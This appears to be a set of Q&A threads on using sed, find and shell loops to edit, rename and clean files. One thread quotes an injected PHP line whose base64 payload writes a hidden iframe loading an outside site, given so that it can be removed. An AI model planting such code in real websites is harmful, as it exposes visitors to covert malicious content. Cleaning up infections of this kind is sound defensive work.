deleting and replacing string inside .php file - regex

I am having some problems with loading a PHP file and then replacing its content with something else.
My code looks like this:
$pattern="*random text*"
$rep=" "
$where=`ls *.php`
find -f $where -name "*.php" -exec sed -i 's/$pattern/$rep/g' {} \;
This won't load the entire line of text. Also, is there a limit on how many characters $pattern can hold?
Also, is there a way to make this .sh file execute every 15 minutes, for example?
I am using Mac OS X.
Thanks!

The syntax $var="value" is wrong. You need to say var="value".
If you just want to act on the files matching *.php in a single directory, there is no need to use find. Just use a for loop:
pattern="*random text*"
rep=" "
for file in *.php
do
sed -i "s/$pattern/$rep/g" "$file"
done
See the usage of sed "s/$var/.../g" instead of sed 's/$var/.../g'. The double quotes expand the variables within the expression; otherwise, you would be looking for a literal $var.
Note that sed -i alone does not work in OS X, so you probably have to say sed -i ''.
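A minimal sketch of the same loop in a form that should run with both GNU sed and the BSD sed shipped with OS X: the -i.bak spelling (suffix attached to the option) is accepted by both and leaves a backup of each file. The temporary directory, the file name page.php and its contents are made up for the demonstration.

```shell
# Hypothetical demo directory and file; not taken from the question.
workdir=$(mktemp -d)
printf 'keep this\nremove random text here\n' > "$workdir/page.php"

pattern="random text"
rep=" "
for file in "$workdir"/*.php; do
    # Double quotes let the shell expand $pattern and $rep before sed runs.
    # -i.bak edits in place and keeps the original as page.php.bak.
    sed -i.bak "s/$pattern/$rep/g" "$file"
done

result=$(cat "$workdir/page.php")
echo "$result"
```

If the pattern or replacement can contain a /, pick another delimiter for the s command, for example s|...|...|g.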
Example of replacement:
Given a file:
$ cat a
hello
<?php eval(1234567890) regular php code ?>
bye
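Let's replace everything inside eval() with X (-r is the GNU sed spelling for extended regular expressions; -E works with both GNU and BSD sed):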
$ sed -r 's/(eval\()[^)]*/\1X/' a
hello
<?php eval(X) regular php code ?>
bye
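As a variation on the example above, here is a sketch that empties the parentheses completely instead of inserting X, using -E so that it should behave the same on OS X and Linux. The temporary file stands in for the file a.

```shell
# Recreate the sample file from the example in a temporary location.
sample=$(mktemp)
printf 'hello\n<?php eval(1234567890) regular php code ?>\nbye\n' > "$sample"

# Capture "eval(" and drop everything up to (not including) the closing ")".
out=$(sed -E 's/(eval\()[^)]*/\1/' "$sample")
echo "$out"
```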

Related

Replace a > with a " sed regular expression

I have lots of files that have lines that are in the following way:
#include "3rd-party/*lots folders*>
The problem is that each line ends with > instead of ".
Is there a quick regex for sed to change that?
Basically, if the line starts with #include "3rd-party, it should replace the last character with ".
Thanks in advance
You can use this:
sed -i '' '/^[[:blank:]]*#include "3rd-party/s/>$/"/' file
#include "3rd-party/*lots folders*"
Basically you can use:
sed '/^[[:space:]]*#include "3rd-party/s/>[[:space:]]*$/"/' file
Explanation:
/^[[:space:]]*#include/ is an address, a regular expression address. The subsequent command will apply only to lines which start with optional whitespace followed by an #include statement.
s/>[[:space:]]*$/"/ replaces > followed by optional space and the end of the line by a ".
Use the -i option if you want to change the file in place:
sed -i '/^[[:space:]]*#include/s/>[[:space:]]*$/"/' file
On a bunch of, let's say, C files, use find and its -exec option:
find . -name '*.c' -exec sed -i '/^[[:space:]]*#include/s/>[[:space:]]*$/"/' {} \;
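To see what the address and the substitution do together, here is a small sketch run on made-up input (the header names are invented for illustration). Only the lines that start with #include "3rd-party are touched; an angle-bracket include and an ordinary line containing > stay as they are.

```shell
# Hypothetical sample input; the header paths are placeholders.
sample=$(mktemp)
printf '%s\n' \
    '#include "3rd-party/lib/foo.h>' \
    '#include <stdio.h>' \
    '  #include "3rd-party/bar/baz.h>  ' \
    'int x = a > b;' > "$sample"

# Address selects the 3rd-party includes; s replaces the trailing > (and any
# whitespace after it) with a closing double quote.
fixed=$(sed '/^[[:space:]]*#include "3rd-party/s/>[[:space:]]*$/"/' "$sample")
echo "$fixed"
```

Restricting the address to "3rd-party matters: with a bare #include address, the system header line would lose its closing > as well.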
You can use sed for searching a pattern and doing an action on this line like
sed '/search_pattern/{action}' your_file
The action you want is to replace the last character of the line. The pattern >$ matches it: > is the character to look for and $ means that it must be at the end of the line.
The sed command for this is s///, which works like s/search_pattern/replace_pattern/.
For your case this looks like:
sed '/#include "3rd-party/{s/>$/"/}' your_file
But since sed is a (s)tream (ed)itor, it only prints the result. Use sed's -i option to make your changes in place, or redirect the output with > to a new file.
Like this
sed -i '/#include "3rd-party/{s/>$/"/}' your_file
or like this
sed '/#include "3rd-party/{s/>$/"/}' your_file > new_file
Please let me know if this does your work.

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" "$(sed -n 's/<title>\([^<]*\)<\/title>/\1/p' "$file" | sed -e 's/[[:blank:]][[:blank:]]*/_/g').txt"
done
So, if you have files 1.txt, 2.txt and 3.txt, with cat, dog and my hippo respectively in their <title> tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted $file in case there are spaces in filenames, and added a second sed to convert any runs of whitespace in the <title> tag to _ in the resulting filenames. NOTE: [[:blank:]] matches a space or a tab character.
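A slightly more defensive sketch of the same idea, under a few assumptions of mine: the title sits on one line, anything around the tag on that line should be dropped (hence the extra .* on both sides), and files without a title should be skipped rather than renamed to ".txt". The directory and file contents are invented for the demonstration.

```shell
# Hypothetical demo files in a temporary directory.
dir=$(mktemp -d)
printf '<html><head><title>my hippo</title></head></html>\n' > "$dir/1.txt"
printf '<title>cat</title>\n' > "$dir/2.txt"
printf 'no title here\n' > "$dir/3.txt"

for file in "$dir"/*.txt; do
    # Extract the first title and turn runs of spaces/tabs into a single _.
    title=$(sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' "$file" | head -n 1 | tr -s ' \t' '_')
    if [ -z "$title" ]; then
        echo "skipping $file: no <title> found" >&2
        continue
    fi
    mv "$file" "$dir/$title.txt"
done
ls "$dir"
```

Titles containing a / or other characters that are awkward in filenames are not handled here and would need extra cleanup.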
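You can enclose an expression in grave accent characters (`) to have its output substituted at that position. For a single file (file.txt here is just a placeholder name), try:
mv file.txt "`sed -n 's/<title>\(.*\)<\/title>/\1/p' file.txt`.txt"
It is not very flexible: it handles one file at a time, and sed has to print the title (-n plus the p flag) instead of editing in place with -i, which produces no output.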
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution search for pattern in each one of your .txt files. For each file it creates string mv 'file_name' 'found_pattern'.
With the e flag (a GNU sed extension) at the end of the s command, the resulting string is executed directly as a shell command, thus renaming your files.
Some hints:
Note the use of =s instead of /s as delimiters for the sed substitution: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). This way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
                                          ^
)
So use it with caution! I would recommend first running the line without the final e: it won't execute any mv command, but will instead print what would be executed if you were to add the e.
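The dry run can be sketched as follows. This variant is my own adaptation: it adds -n and the p flag so that only the generated mv command is printed (not the rest of each file), and it uses nothing specific to GNU sed. The directory and the file 2.txt are made up.

```shell
# Hypothetical demo file in a temporary directory.
dir=$(mktemp -d)
printf '<html>\n<title>dog</title>\n</html>\n' > "$dir/2.txt"

# Build the list of mv commands without running any of them.
plan=$(cd "$dir" && for i in *.txt; do
    sed -n "s=<title>\(.*\)</title>=mv '$i' '\1'=p" "$i"
done)
echo "$plan"
```

Once the printed commands look right, they can be run with GNU sed by switching the p flag back to e as in the answer above.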
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls *.txt | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always set the xargs replacement string with -i\{\}, because the resulting command then stays compatible with find and its {} placeholder.
The -maxdepth option keeps find from descending into subdirectories; if there are no subdirectories, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution is based on two steps:
get the title line
remove everything before and after the title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.
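One design point worth sketching: instead of pasting {} into the bash -c script text, the file name can be handed over as a positional parameter ($1), so that quotes or $ in a file name are not interpreted as shell code. This is a variation under my own assumptions (title on one line, rename inside the same directory, skip files without a title); the directory and file are invented.

```shell
# Hypothetical demo file in a temporary directory.
dir=$(mktemp -d)
printf '<html><title>dog</title></html>\n' > "$dir/2.txt"

# The "_" fills $0 of the inline script; find substitutes {} as $1.
find "$dir" -maxdepth 1 -type f -name '*.txt' -exec bash -c '
    file=$1
    title=$(sed -n "s#.*<title>\([^<]*\)</title>.*#\1#p" "$file" | head -n 1)
    target="$(dirname "$file")/$title.txt"
    # Skip files without a title and files that already have the right name.
    if [ -n "$title" ] && [ "$file" != "$target" ]; then
        mv "$file" "$target"
    fi
' _ {} \;
ls "$dir"
```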

bash script with simple regular expression

Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script should read every file in the directory specified by FILES and remove the lines containing 'HTTP' or 'RT'. However, it seems that the OR part of the regular expression is not working. That is, if I just have sed -i '/HTTP/d' $f, it removes all lines containing HTTP, but I cannot get it to remove both HTTP and RT.
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!
Two ways of doing it (at least):
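Having sed understand your regex as an extended regular expression, where | means OR (in a basic regular expression, | is a literal character):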
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f
Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."
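The preview-then-delete routine can be tried safely on a scratch file first. In this sketch the file contents are made up, and neither command modifies the file, since -i is left out on purpose.

```shell
# Hypothetical scratch file with two lines that should go and two that stay.
f=$(mktemp)
printf 'keep me\nsee HTTP link\nRT @someone\nalso keep\n' > "$f"

# Step 1: print only what the delete command would remove.
would_delete=$(sed -n -E '/HTTP|RT/p' "$f")
# Step 2: show what would remain after the deletion.
remaining=$(sed -E '/HTTP|RT/d' "$f")

printf 'would delete:\n%s\n\nremaining:\n%s\n' "$would_delete" "$remaining"
```

Note that /RT/ also matches RT inside longer words such as START, which is exactly the kind of surprise the preview is meant to catch.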
Well, first of all, the loop iterates over the value of the FILES variable itself (as a single word, since it is quoted), not over the files in that directory.
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.
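As an alternative sketch to looping over the output of find, a plain glob copes with file names that contain spaces. It assumes FILES names a directory; here it points at a temporary one with an invented file, and -i.bak is used because that spelling is accepted by both GNU and BSD sed.

```shell
# Hypothetical directory standing in for $FILES.
FILES=$(mktemp -d)
printf 'a\nHTTP x\nRT y\nb\n' > "$FILES/one file.txt"

for f in "$FILES"/*; do
    # Only regular files; skips subdirectories.
    [ -f "$f" ] || continue
    echo "$f"
    sed -i.bak -e '/HTTP/d' -e '/RT/d' "$f"
done
cat "$FILES/one file.txt"
```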

How to delete lines while preserving certain characters via sed/perl?

I'm trying to do a mass search and replace on all .php files for the following string for malware cleanup:
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}
I can delete the entire line via sed '/buffer.base64_decode/d' file.php. However, I still need the opening <?php
So what really needs to be done is a search and replace of buffer.base64_decode for <?php and my brain is all mashed potatoes after a long day in front of this evil computer.
Or maybe I've thought myself into a tiny box and am going about this all wrong?
Instead of deleting the line, why don't you simply change it? Here's how, using GNU sed:
sed -i '/buffer.base64_decode/c \<?php ' file.php
Now for all files in your working directory:
find . -type f -name "*.php" -exec sed -i '/buffer.base64_decode/c \<?php ' {} \;
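If GNU sed is not available, a sketch of an equivalent using only the s command is to replace the whole matching line. The sample file below is invented, and its base64 payload is a short placeholder rather than the string from the question.

```shell
# Hypothetical infected file; the payload is a shortened placeholder.
f=$(mktemp)
cat > "$f" <<'EOF'
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD4=');}
echo "legitimate code";
EOF

# Replace any line containing the marker with a bare opening tag.
cleaned=$(sed 's/^.*buffer\.base64_decode.*$/<?php/' "$f")
echo "$cleaned"
```

Like the c command, this discards everything else on the matching line, so it only fits when the injected code sits on a line of its own with the opening tag.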
perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php

Using bash regexp to insert the contents of a file into another

I have a javascript file with a jquery function call:
$.getScript('/scripts/files/file.js');
I want to replace that line with the contents of the file at that path. This is the bash script I have so far:
cat public/scripts/old.js | sed -e "s/$\.getScript\('(.)+'\);/$(cat \1)/g" > public/scripts/new.js
However, my regular expression and remembering the path does not seem to be working correctly. I get cat: 1: No such file or directory
as it seems as if cat is being called on the number 1 (which should be the remembered portion of the regexp). How can I fix this?
Because you are using $() inside double quotes, the shell is parsing the cat \1, stripping the backslash and trying to run cat 1 to pass its output as part of the argument to sed. Sed has a command (r) for reading a file, but the filename must be literal, and cannot be the result of previous sed commands (at least in standard sed, perhaps some implementations provide that ability). sed is really the wrong tool for this. You could do an awk solution, but it will be fragile.
Here's a possible perl solution (warning: fragile):
perl -ne 'if( $_ =~ /\$\.getScript\('"'(.*)'"'\)/ )
{ system( "cat $1" ) } else {print}' public/scripts/old.js
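For comparison, here is a rough shell sketch of the same inlining, equally fragile. It assumes one $.getScript call per line, single-quoted paths, and that the web path /scripts/... maps onto a local root directory (the question's public/ folder; a temporary directory stands in for it here). All file contents are made up.

```shell
# Hypothetical stand-in for the public/ directory.
root=$(mktemp -d)
mkdir -p "$root/scripts/files"
printf 'console.log("included");\n' > "$root/scripts/files/file.js"
cat > "$root/scripts/old.js" <<'EOF'
var a = 1;
$.getScript('/scripts/files/file.js');
var b = 2;
EOF

while IFS= read -r line; do
    # Pull the quoted path out of a getScript line; empty for other lines.
    path=$(printf '%s\n' "$line" | sed -n "s/.*[$]\.getScript('\([^']*\)');.*/\1/p")
    if [ -n "$path" ] && [ -f "$root$path" ]; then
        cat "$root$path"          # inline the referenced file
    else
        printf '%s\n' "$line"     # copy every other line unchanged
    fi
done < "$root/scripts/old.js" > "$root/scripts/new.js"
cat "$root/scripts/new.js"
```

Lines whose referenced file does not exist are copied through unchanged rather than dropped.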